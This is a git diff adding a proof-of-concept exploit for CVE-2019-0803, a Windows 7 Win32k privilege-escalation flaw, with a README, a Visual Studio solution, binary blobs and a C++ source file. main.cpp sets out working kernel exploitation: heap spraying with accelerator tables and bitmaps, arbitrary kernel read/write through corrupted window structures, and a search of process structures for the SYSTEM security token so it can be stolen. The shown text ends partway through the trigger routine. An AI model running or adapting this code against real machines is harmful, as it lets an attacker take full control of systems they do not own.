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
BbR7Ty

literal 0
HcmV?d00001

diff --git a/CVE-2019-0803/CVE-2019-0803/README.md b/CVE-2019-0803/CVE-2019-0803/README.md
new file mode 100644
index 0000000..2d15c71
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/README.md
@@ -0,0 +1,12 @@
+# CVE-2019-0803
+Win32k Elevation of Privilege Poc
+
+
+Screenshot
+---------------
+![效果图](http://img.arch-vile.com/CVE-2019-0803.png)
+
+
+Reference
+-----------------------------
+(steal Security token) https://github.com/mwrlabs/CVE-2016-7255
diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test.sln b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test.sln
new file mode 100644
index 0000000..f6fe69e
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.27428.2005
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "poc_test", "poc_test\poc_test.vcxproj", "{13B512BD-3E32-4787-9C1C-0966899F3608}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.ActiveCfg = Debug|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.Build.0 = Debug|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.ActiveCfg = Debug|Win32
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.Build.0 = Debug|Win32
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.ActiveCfg = Release|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.Build.0 = Release|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.ActiveCfg = Release|Win32
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {FC1892D3-67AE-4D7F-99F6-684EA05DA216}
+	EndGlobalSection
+EndGlobal
diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/DDE.cpp b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/DDE.cpp
new file mode 100644
index 0000000000000000000000000000000000000000..97d6e97a1eaa42a44f26464eeba3c9e823f62efe
GIT binary patch
literal 10478
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
A!vFvP

literal 0
HcmV?d00001

diff --git a/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/main.cpp b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/main.cpp
new file mode 100644
index 0000000..633fe8b
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/main.cpp
@@ -0,0 +1,570 @@
+#include "stdafx.h"
+
+PSHAREDINFO gSharedInfo = NULL;
+
+HWND    hwndIcon1 = NULL;
+HWND    hwndIcon2 = NULL;
+PBYTE   pwndIcon1 = NULL;
+PBYTE   pwndIcon2 = NULL;
+
+HWND    hwndMenu = NULL;
+
+unsigned long long MySecTokenAddr = NULL;
+unsigned long long MyEPROCESSAddr = NULL;
+
+HDC     hdc = NULL;
+HGDIOBJ hgdiObj = NULL;
+PBYTE   pgdiObj = NULL;
+
+HBITMAP hBitmap[1000] = { NULL };
+
+static PBYTE   buffFakePal = NULL;
+static LPACCEL buffAccTabl = NULL;
+
+unsigned long long SystemSecurityTokenAddr = NULL;
+
+static BOOL xxInitExploitInfo(VOID)
+{
+    gSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32"), "gSharedInfo");
+    return TRUE;
+}
+
+static BOOL xxZeroIconWindow2strName(VOID)
+{
+	DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
+
+    DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
+    DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
+    DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
+    DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
+
+	SetWindowLongW(hwndIcon1, offset + 0x0, 0);
+	SetWindowLongW(hwndIcon1, offset + 0x4, 0);
+	SetWindowLongW(hwndIcon1, offset + 0x8, 0);
+	SetWindowLongW(hwndIcon1, offset + 0xC, 0);
+
+    WCHAR szPath[100] = {};
+    GetWindowText(hwndIcon2, szPath, 100);
+    printf("[*]text:%ws\n", szPath);
+
+    if (wcslen(szPath) == 0)
+    {
+        SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
+        SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
+        SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
+        SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
+        return TRUE;
+    }
+    else
+    {
+        return FALSE;
+    }
+}
+
+typedef struct _LARGE_UNICODE_STRING
+{
+    ULONG Length;           // 000
+    ULONG MaximumLength : 31; // 004
+    ULONG bAnsi : 1;          // 004
+    PWSTR Buffer;           // 008
+} LARGE_UNICODE_STRING, * PLARGE_UNICODE_STRING;
+
+static BOOL WriteKernelAddress(UINT64 qwAddress, LPWSTR content)
+{
+    DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
+
+    //ע:���ﲻҪ��LARGE_UNICODE_STRING�ij����ֶ����ó�0��
+    //DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
+    //DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
+    DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
+    DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
+
+    //SetWindowLongW(hwndIcon1, offset + 0x0, 0);
+    //SetWindowLongW(hwndIcon1, offset + 0x4, 0);
+    SetWindowLongW(hwndIcon1, offset + 0x8, (qwAddress & 0xffffffff));
+    SetWindowLongW(hwndIcon1, offset + 0xC, (qwAddress & 0xffffffff00000000) >> 32);
+
+    SetWindowText(hwndIcon2, content);
+
+    //SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
+    //SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
+    SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
+    SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
+
+    return TRUE;
+}
+
+static int ReadKernelAddress(UINT64 qwAddress)
+{
+    DWORD offset = (DWORD)((pwndIcon2 + OFFSET_SPWNDPARENT_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
+
+    DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
+    DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
+
+    SetWindowLongW(hwndIcon1, offset + 0x0, (qwAddress & 0xffffffff));
+    SetWindowLongW(hwndIcon1, offset + 0x4, (qwAddress & 0xffffffff00000000) >> 32);
+
+    unsigned int read = (int)GetAncestor(hwndIcon2, GA_PARENT);
+
+    SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
+    SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
+
+    return read;
+}
+
+unsigned long long ReadPtrFromKernelMemory(unsigned long long addr) {
+    unsigned int LowAddr = ReadKernelAddress(addr);
+    unsigned int HighAddr = ReadKernelAddress(addr + 4);
+    unsigned long long Addr = ((unsigned long long)HighAddr << 32) + LowAddr;
+    return Addr;
+}
+
+typedef struct _HEAD
+{
+    HANDLE h;
+    DWORD  cLockObj;
+} HEAD, * PHEAD;
+
+typedef struct _THROBJHEAD
+{
+    HEAD h;
+    PVOID pti;
+} THROBJHEAD, * PTHROBJHEAD;
+
+
+typedef struct _THRDESKHEAD
+{
+    THROBJHEAD h;
+    PVOID    rpdesk;
+    PVOID       pSelf;   // points to the kernel mode address
+} THRDESKHEAD, * PTHRDESKHEAD;
+
+
+void FindSecurityTokens() {
+    unsigned long long pti = (unsigned long long)(&((THRDESKHEAD*)pwndIcon1)->h.pti);
+    printf("[*]Searching for current processes EPROCESS structure\n");
+
+    unsigned long long ptiaddress = ReadPtrFromKernelMemory(pti);
+    printf("\tptiaddress == %llx\n", ptiaddress);
+
+    unsigned long long threadTagPointer = ReadPtrFromKernelMemory(ptiaddress);
+    printf("\ttagTHREAD == %llx\n", threadTagPointer);
+
+    unsigned long long kapcStateAddr = ReadPtrFromKernelMemory(threadTagPointer + OFFSET_APCADDR_WIN7);
+    printf("\tkapc_stateAddr == %llx\n", kapcStateAddr);
+
+    MyEPROCESSAddr = ReadPtrFromKernelMemory(kapcStateAddr + OFFSET_APCEPROCESS_WIN7);
+
+    MySecTokenAddr = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7);
+    printf("\tOriginal security token pointer: 0x%llx\n", MySecTokenAddr);
+
+    printf("[*]Searching for SYSTEM security token address\n");
+
+    unsigned long long nextProc = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
+    printf("\tNext eprocess address: 0x%llx\n", nextProc);
+
+    unsigned int pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
+    printf("\tFound pid: 0x%X\n", pid);
+
+    while (true) {
+        nextProc = ReadPtrFromKernelMemory(nextProc + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
+        printf("\tNext eprocess address: 0x%llx\n", nextProc);
+
+        pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
+        printf("\tFound pid: 0x%X\n", pid);
+        //Step 9.2
+        if (pid == 4) {
+            printf("\ttarget process found!\n");
+            SystemSecurityTokenAddr = ReadPtrFromKernelMemory(nextProc + OFFSET_SECTOKEN_WIN7);
+            break;
+        }
+    }
+}
+
+static BOOL xxCreateIconWindowEx(VOID)
+{
+	// icon
+	HWND hwnd1 = CreateWindowExW(0,
+		L"#32772",
+		NULL,
+		WS_MINIMIZE | WS_DISABLED,
+		0,
+		0,
+		0,
+		0,
+		NULL,
+		NULL,
+		NULL,
+		NULL);
+	// icon
+	HWND hwnd2 = CreateWindowExW(0,
+		L"#32772",
+		NULL,
+		WS_MINIMIZE | WS_DISABLED,
+		0,
+		0,
+		0,
+		0,
+		NULL,
+		NULL,
+		NULL,
+		NULL);
+
+	PSERVERINFO  psi = gSharedInfo->psi;
+	PHANDLEENTRY phe = gSharedInfo->aheList;
+
+	PBYTE pwnd1 = NULL;
+	PBYTE pwnd2 = NULL;
+
+	for (ULONG c = 0; c < psi->cHandleEntries; c++)
+	{
+		if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd1)
+		{
+			pwnd1 = (PBYTE)phe[c].phead;
+			break;
+		}
+	}
+	for (ULONG c = 0; c < psi->cHandleEntries; c++)
+	{
+		if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd2)
+		{
+			pwnd2 = (PBYTE)phe[c].phead;
+			break;
+		}
+	}
+	if (pwnd1 <= pwnd2)
+	{
+		pwndIcon1 = pwnd1;
+		hwndIcon1 = hwnd1;
+		pwndIcon2 = pwnd2;
+		hwndIcon2 = hwnd2;
+	}
+	else
+	{
+		pwndIcon1 = pwnd2;
+		hwndIcon1 = hwnd2;
+		pwndIcon2 = pwnd1;
+		hwndIcon2 = hwnd1;
+	}
+	printf("[+]WND1: %p, WND2: %p\n", pwndIcon1, pwndIcon2);
+	return TRUE;
+}
+
+static BOOL xxTriggerExploitEx(VOID)
+{
+	DWORD count = 0;
+
+	HACCEL hAccel1[1000] = { NULL };
+	HACCEL hAccel2[1000] = { NULL };
+
+	for (UINT i = 0; i < 200; i++)
+	{
+        //�������ڴ��϶��ȷ��0x350��С���ڴ���Ƭ��϶�պñ��������������Bitmap��DIBռ�ӳ�������
+		LPACCEL Entries = (LPACCEL)malloc(132 * sizeof(Entries));
+		for (UINT i = 0; i < 132; i++)
+		{
+            Entries[i].fVirt = FCONTROL;
+            Entries[i].key = 0x1234;
+            Entries[i].cmd = 0x4444;
+		}
+		hAccel1[i] = NtUserCreateAcceleratorTable(Entries, 132);
+		if (hAccel1[i] == NULL)
+		{
+			break;
+		}
+	}
+
+    //����ռ��
+	for (UINT i = 0; i < 1000; i++)
+	{
+		LPACCEL Entries = (LPACCEL)malloc(533 * sizeof(Entries));
+		for (UINT i = 0; i < 533; i++)
+		{
+            Entries[i].fVirt = FCONTROL;
+            Entries[i].key = 0x1234;
+            Entries[i].cmd = 0x4444;
+		}
+		hAccel2[i] = NtUserCreateAcceleratorTable(Entries, 533);
+	}
+	for (UINT i = 0; i < 400; i++)
+	{
+		hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
+		if (hBitmap[i] == NULL)
+		{
+			break;
+		}
+	}
+	hwndMenu = CreateWindowExW(WS_EX_DLGMODALFRAME | WS_EX_LEFTSCROLLBAR | WS_EX_NOINHERITLAYOUT | WS_EX_LAYOUTRTL | WS_EX_COMPOSITED,
+		L"#32768",
+		L"bar",
+		0x43A | WS_MAXIMIZEBOX | WS_VSCROLL | WS_CAPTION | WS_MAXIMIZE,
+		58,
+		18,
+		60,
+		-23,
+		NULL,
+		NULL,
+		NULL,
+		NULL);
+	NtUserShowWindow(hwndMenu, 0);
+	UpdateWindow(hwndMenu);
+
+	PAINTSTRUCT paint = { 0 };
+	hdc = NtUserBeginPaint(hwndMenu, &paint);
+	hgdiObj = GetCurrentObject(hdc, OBJ_BITMAP);
+
+	pgdiObj = *(PBYTE *)((*(PBYTE *)((*(PBYTE *)(__readgsqword(0x30) + 0x60)) + 0xF8)) + sizeof(HANDLEENTRY) * (WORD)(DWORD_PTR)hgdiObj);
+
+	for (UINT i = 400; i < 800; i++)
+	{
+		hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
+		if (hBitmap[i] == NULL)
+		{
+			break;
+		}
+	}
+
+	for (UINT i = 0; i < 1000; i++)
+	{
+		PBYTE  pacc = NULL;
+		HACCEL hacc = hAccel2[i];
